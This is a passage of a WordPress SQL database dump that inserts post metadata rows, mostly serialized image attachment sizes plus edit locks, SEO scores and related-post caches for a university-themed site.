9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12926, 5749, '_wp_attached_file', '2019/06/64223975_832336327142557_8361083495925153792_o.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(12927, 5749, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/06/64223975_832336327142557_8361083495925153792_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"64223975_832336327142557_8361083495925153792_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"64223975_832336327142557_8361083495925153792_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"64223975_832336327142557_8361083495925153792_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"64223975_832336327142557_8361083495925153792_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"64223975_832336327142557_8361083495925153792_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12928, 5750, '_wp_attached_file', '2019/06/120662.1-5.jpg'),
(12929, 5750, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:22:\"2019/06/120662.1-5.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"120662.1-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"120662.1-5-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"120662.1-5-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"120662.1-5-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"120662.1-5-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12930, 5751, '_wp_attached_file', '2019/06/120662.1-6.jpg'),
(12931, 5751, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:22:\"2019/06/120662.1-6.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"120662.1-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"120662.1-6-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"120662.1-6-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"120662.1-6-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"120662.1-6-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12932, 5752, '_wp_attached_file', '2019/06/120662.1-7.jpg'),
(12933, 5752, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:22:\"2019/06/120662.1-7.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"120662.1-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"120662.1-7-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"120662.1-7-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"120662.1-7-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"120662.1-7-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12942, 5755, '_wp_attached_file', '2019/06/62428842_832408593801997_3749366253085523968_o.jpg'),
(12943, 5755, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/06/62428842_832408593801997_3749366253085523968_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"62428842_832408593801997_3749366253085523968_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"62428842_832408593801997_3749366253085523968_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"62428842_832408593801997_3749366253085523968_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"62428842_832408593801997_3749366253085523968_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"62428842_832408593801997_3749366253085523968_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12944, 5756, '_wp_attached_file', '2019/06/62428842_832408593801997_3749366253085523968_o-1.jpg'),
(12945, 5756, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2019/06/62428842_832408593801997_3749366253085523968_o-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"62428842_832408593801997_3749366253085523968_o-1-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-1-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12946, 5757, '_wp_attached_file', '2019/06/62428842_832408593801997_3749366253085523968_o-2.jpg'),
(12947, 5757, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2019/06/62428842_832408593801997_3749366253085523968_o-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"62428842_832408593801997_3749366253085523968_o-2-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-2-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12948, 5758, '_wp_attached_file', '2019/06/62428842_832408593801997_3749366253085523968_o-3.jpg'),
(12949, 5758, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2019/06/62428842_832408593801997_3749366253085523968_o-3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-3-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-3-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"62428842_832408593801997_3749366253085523968_o-3-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-3-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12950, 5759, '_wp_attached_file', '2019/06/62428842_832408593801997_3749366253085523968_o-4.jpg'),
(12951, 5759, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2019/06/62428842_832408593801997_3749366253085523968_o-4.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-4-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-4-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"62428842_832408593801997_3749366253085523968_o-4-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"62428842_832408593801997_3749366253085523968_o-4-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12952, 5760, '_edit_lock', '1560398873:14'),
(12953, 5760, '_edit_last', '14'),
(12954, 5760, '_thumbnail_id', '5789'),
(12958, 5760, '_hide_featured', NULL),
(12959, 5760, '_yoast_wpseo_content_score', '30'),
(12960, 5760, '_yoast_wpseo_primary_category', '31'),
(12961, 5760, '_wpas_done_all', '1'),
(12962, 5762, '_edit_lock', '1560399747:14'),
(12963, 5762, '_edit_last', '14'),
(12964, 5762, '_oembed_05ba5d682d814173ab933a00d529a4e8', '{{unknown}}'),
(12965, 5762, '_thumbnail_id', '5793'),
(12969, 5762, '_hide_featured', NULL),
(12970, 5762, '_yoast_wpseo_content_score', '60'),
(12971, 5762, '_yoast_wpseo_primary_category', '31'),
(12972, 5762, '_wpas_done_all', '1'),
(12973, 5762, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575555208;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5962;}i:1;a:1:{s:2:\"id\";i:5769;}i:2;a:1:{s:2:\"id\";i:3975;}}}}'),
(12974, 5764, '_edit_lock', '1560400184:14'),
(12975, 5764, '_edit_last', '14'),
(12976, 5765, '_wp_attached_file', '2019/06/62441440_832421853800671_1207251672670142464_o.jpg'),
(12977, 5765, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/06/62441440_832421853800671_1207251672670142464_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"62441440_832421853800671_1207251672670142464_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"62441440_832421853800671_1207251672670142464_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"62441440_832421853800671_1207251672670142464_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"62441440_832421853800671_1207251672670142464_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"62441440_832421853800671_1207251672670142464_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12978, 5764, '_thumbnail_id', '5794'),
(12982, 5764, '_hide_featured', NULL),
(12983, 5764, '_yoast_wpseo_content_score', '30'),
(12984, 5764, '_yoast_wpseo_primary_category', '31'),
(12985, 5764, '_wpas_done_all', '1'),
(12992, 5768, '_wp_attached_file', '2019/06/64608493_832460173796839_4203946351903375360_o.jpg'),
(12993, 5768, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/06/64608493_832460173796839_4203946351903375360_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"64608493_832460173796839_4203946351903375360_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"64608493_832460173796839_4203946351903375360_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"64608493_832460173796839_4203946351903375360_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"64608493_832460173796839_4203946351903375360_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"64608493_832460173796839_4203946351903375360_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12994, 5769, '_edit_lock', '1560400538:14'),
(12995, 5769, '_oembed_5821c6fa6c82e5dfee73687d5d821548', '{{unknown}}'),
(12996, 5769, '_edit_last', '14'),
(12997, 5769, '_thumbnail_id', '5795'),
(13001, 5769, '_hide_featured', NULL),
(13002, 5769, '_yoast_wpseo_content_score', '60'),
(13003, 5769, '_yoast_wpseo_primary_category', '31'),
(13004, 5769, '_wpas_done_all', '1'),
(13005, 5769, '_oembed_82bc6562ec9ce7760ce6b32e565f5eb3', '{{unknown}}'),
(13006, 5769, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574863253;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5762;}i:1;a:1:{s:2:\"id\";i:5381;}i:2;a:1:{s:2:\"id\";i:5760;}}}}'),
(13012, 5760, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575076132;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5865;}i:1;a:1:{s:2:\"id\";i:5381;}i:2;a:1:{s:2:\"id\";i:4875;}}}}'),
(13013, 5764, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574771469;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5979;}i:1;a:1:{s:2:\"id\";i:5762;}i:2;a:1:{s:2:\"id\";i:5994;}}}}'),
(13014, 5775, '_wp_attached_file', '2019/05/424243.jpg'),
(13015, 5775, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:522;s:6:\"height\";i:520;s:4:\"file\";s:18:\"2019/05/424243.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"424243-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"424243-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"424243-301x300.jpg\";s:5:\"width\";i:301;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13016, 5776, '_wp_attached_file', '2019/05/424243-1.jpg'),
(13017, 5776, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:522;s:6:\"height\";i:520;s:4:\"file\";s:20:\"2019/05/424243-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"424243-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"424243-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"424243-1-301x300.jpg\";s:5:\"width\";i:301;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13018, 5777, '_wp_attached_file', '2019/05/424243-2.jpg'),
(13019, 5777, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:522;s:6:\"height\";i:520;s:4:\"file\";s:20:\"2019/05/424243-2.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"424243-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"424243-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"424243-2-301x300.jpg\";s:5:\"width\";i:301;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13020, 5779, '_wp_attached_file', '2019/05/424243-3.jpg'),
